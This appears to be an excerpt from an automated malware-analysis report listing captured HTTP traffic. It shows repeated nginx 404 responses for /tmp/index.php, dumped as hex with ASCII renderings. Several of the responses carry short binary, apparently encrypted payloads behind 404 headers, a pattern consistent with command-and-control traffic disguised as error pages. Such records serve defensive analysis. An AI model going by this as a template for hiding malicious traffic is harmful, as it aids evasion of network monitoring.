                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:52:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:52:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:52:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:52:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:52:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:52:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:52:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:53:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:53:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:53:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:53:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:53:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW|
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:53:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:53:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:53:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:53:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
